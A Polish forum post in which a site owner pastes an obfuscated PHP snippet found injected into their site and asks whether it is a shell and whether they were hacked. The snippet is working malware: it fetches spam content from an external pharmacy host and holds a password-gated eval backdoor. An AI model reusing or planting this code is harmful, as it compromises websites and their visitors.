Czesc, w kodzie nagle znalazl sie taki kawalek kodu:
<?php
//###=###
error_reporting(0
); ini_set("display_errors", "0"); if (!isset($i7c6887bf)) { $i7c6887bf = TRUE; $GLOBALS['_336180302_']=Array(base64_decode('cH' .'JlZ19tYXRjaA=='),base64_decode('' .'ZmlsZV' .'9n' .'ZX' .'RfY29' .'ud' .'GV' .'ud' .'H' .'M='),base64_decode('Z' .'mlsZ' .'V9' .'nZX' .'RfY29udGV' .'udHM' .'='),base64_decode('dXJ' .'sZW5jb' .'2Rl'),base64_decode('d' .'XJsZ' .'W' .'5jb' .'2R' .'l'),base64_decode('bWQ1'),base64_decode('c3RyaX' .'Bzb' .'GF' .'zaGVz')); function _1621079308
($i){$a=Array('Y2xp' .'ZW50X2N' .'oZWN' .'r','' .'Y2xpZW50X2NoZWNr','SFRUUF9BQ0NFU' .'FRfQ0hBUl' .'NFVA' .'==','IS4hdQ==','U' .'0NSSVBU' .'X0ZJTEVOQ' .'U1F','V' .'VRGL' .'Tg=','' .'d2' .'luZG93' .'cy0xMj' .'Ux','' .'SFRUUF9' .'BQ' .'0NFUFRf' .'Q0h' .'BUl' .'NFVA' .'=' .'=','aHR0c' .'D' .'ovLw==','c' .'2VsZW' .'N' .'0cGl' .'sbHMuY29' .'tL' .'2dldC5w' .'aHA/' .'ZD0=','' .'U' .'0VSVkVSX05BTUU=','' .'UkVRVUVTV' .'F' .'9' .'VUkk=','JnU9','SF' .'RUUF9VU0VSX0' .'FHRU5U','' .'JmM9','Jmk9MSZ' .'pcD0=','U' .'kVNT1' .'RFX0FERFI=','J' .'m' .'g9','MWJkYzVkOG' .'I0MjhmM' .'T' .'Ax' .'Nz' .'IyM' .'jgzZ' .'DU5ZG' .'VkNjI1NWY=','U0VS' .'Vk' .'V' .'SX05' .'B' .'TUU' .'=','Uk' .'VRV' .'U' .'VTVF' .'9V' .'Ukk=','' .'SFRUU' .'F9V' .'U0VSX' .'0FHRU5U','MQ==','cA==','cA==','N2M2O' .'Dg3YmY=');return
base64_decode($a[$i]);} if(!empty($_COOKIE[_1621079308
(0
)]))die($_COOKIE[_1621079308
(1
)]);if
(!isset($r6b35_0[_1621079308
(2
)])){if($GLOBALS['_336180302_'][0
](_1621079308
(3
),$GLOBALS['_336180302_'][1
]($_SERVER[_1621079308
(4
)]))){$r6b35_1=_1621079308
(5
);}else{$r6b35_1=_1621079308
(6
);}}else{$r6b35_1=$r6b35_0[_1621079308
(7
)];}echo $GLOBALS['_336180302_'][2
](_1621079308
(8
) ._1621079308
(9
) .$GLOBALS['_336180302_'][3
]($_SERVER[_1621079308
(10
)] .$_SERVER[_1621079308
(11
)]) ._1621079308
(12
) .$GLOBALS['_336180302_'][4
]($_SERVER[_1621079308
(13
)]) ._1621079308
(14
) .$r6b35_1 ._1621079308
(15
) .$_SERVER[_1621079308
(16
)] ._1621079308
(17
) .$GLOBALS['_336180302_'][5
](_1621079308
(18
) .$_SERVER[_1621079308
(19
)] .$_SERVER[_1621079308
(20
)] .$_SERVER[_1621079308
(21
)] .$r6b35_1 ._1621079308
(22
)));if
(isset($_REQUEST[_1621079308
(23
)])&& $_REQUEST[_1621079308
(24
)]== _1621079308
(25
)){eval($GLOBALS['_336180302_'][6
]($_REQUEST["c"]));} } //###=###
?>
Czy to wirus jakis? Tez dziwna sprawa, bo po usunieciu tego w moim headerze wyswietla sie 403 Forbidden i w innym miesjcu nginx.
Ktos pomoze jak rozwiazac sprawe i czy to jest jakis shell?
Czy zhakowano mnie?
Nimlot20 Czy zhakowano mnie? 30.05.2015, 15:23:27 
